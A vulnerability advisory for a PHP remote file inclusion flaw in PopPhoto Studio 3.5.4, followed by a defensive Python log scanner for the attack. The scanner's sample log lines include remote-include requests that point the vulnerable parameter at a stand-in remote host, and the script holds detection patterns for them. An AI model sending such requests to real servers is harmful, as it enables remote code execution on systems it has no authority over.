[Original] PHP remote file inclusion vulnerability in resources/includes/popp.config.loader.inc.php in PopSoft Digital PopPhoto Studio 3.5.4 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the include_path parameter (cfg['popphoto_base_path'] variable). NOTE: Pixaria has notified CVE that "PopPhoto is NOT a product of Pixaria. It was a product of PopSoft Digital and is only hosted by Pixaria as a courtesy... The vulnerability listed was patched by the previous vendor and all previous users have received this update."
[CNNVD] PopSoft Digital PopPhoto Studio popp.config.loader.inc.php PHP remote file inclusion vulnerability (CNNVD-200605-280)
A PHP remote file inclusion vulnerability exists in resources/includes/popp.config.loader.inc.php in PopSoft Digital PopPhoto Studio 3.5.4 and earlier. A remote attacker can execute arbitrary PHP code via a URL in the include_path parameter (cfg['popphoto_base_path'] variable). Note: Pixaria has notified CVE that "PopPhoto is not a product of Pixaria. It is a product of PopSoft Digital and is merely hosted free of charge by Pixaria... The vulnerability described was patched by the previous vendor, and all previous users have received the update."
PopPhoto contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to popp.config.loader.inc.php not properly sanitizing user input supplied to the cfg[popphoto_base_path] variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
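To check whether an installation has received requests of the kind described above, the following added example (not code from PopPhoto or from this advisory) scans web server access-log lines for requests to popp.config.loader.inc.php in which the named parameter carries a URL. The log format, the sample lines and the function names are assumptions constructed for illustration; only the script path and parameter names come from the description.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script path and parameter names as given in the advisory text.
SCRIPT = "resources/includes/popp.config.loader.inc.php"
PARAM_RE = re.compile(r"^(include_path|cfg\[['\"]?popphoto_base_path['\"]?\])$", re.I)
# A value that begins with a URL scheme (http://, ftp://, ...) is treated as remote.
REMOTE_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)
# Request line of a combined/common-format access log (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(request_target):
    """Return (name, value) pairs where the loader script receives a URL."""
    parts = urlsplit(request_target)
    if not unquote(parts.path).lower().endswith(SCRIPT):
        return []
    # parse_qsl percent-decodes names and values, so encoded brackets match too.
    return [(name, value)
            for name, value in parse_qsl(parts.query, keep_blank_values=True)
            if PARAM_RE.match(name) and REMOTE_RE.match(value)]

def scan(lines):
    """Return [(line_number, [(name, value), ...])] for every flagged line."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            findings.append((number, hits))
    return findings

# Constructed sample log lines (documentation addresses and a .invalid host).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/May/2006:10:01:22 +0000] "GET /photos/index.php?album=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/May/2006:10:03:41 +0000] "GET /photos/resources/includes/'
    'popp.config.loader.inc.php?cfg[popphoto_base_path]=http://files.example.invalid/a.txt HTTP/1.0" 200 312',
    '198.51.100.7 - - [12/May/2006:10:03:55 +0000] "GET /photos/resources/includes/'
    'popp.config.loader.inc.php?cfg%5Bpopphoto_base_path%5D=http%3A%2F%2Ffiles.example.invalid%2Fa.txt HTTP/1.1" 200 312',
    '192.0.2.10 - - [12/May/2006:10:05:02 +0000] "GET /photos/resources/includes/'
    'popp.config.loader.inc.php?include_path=/var/www/photos/ HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {hits}")
```

The check covers only query-string parameters whose value starts with a URL scheme; POST bodies do not appear in access logs and need a separate data source.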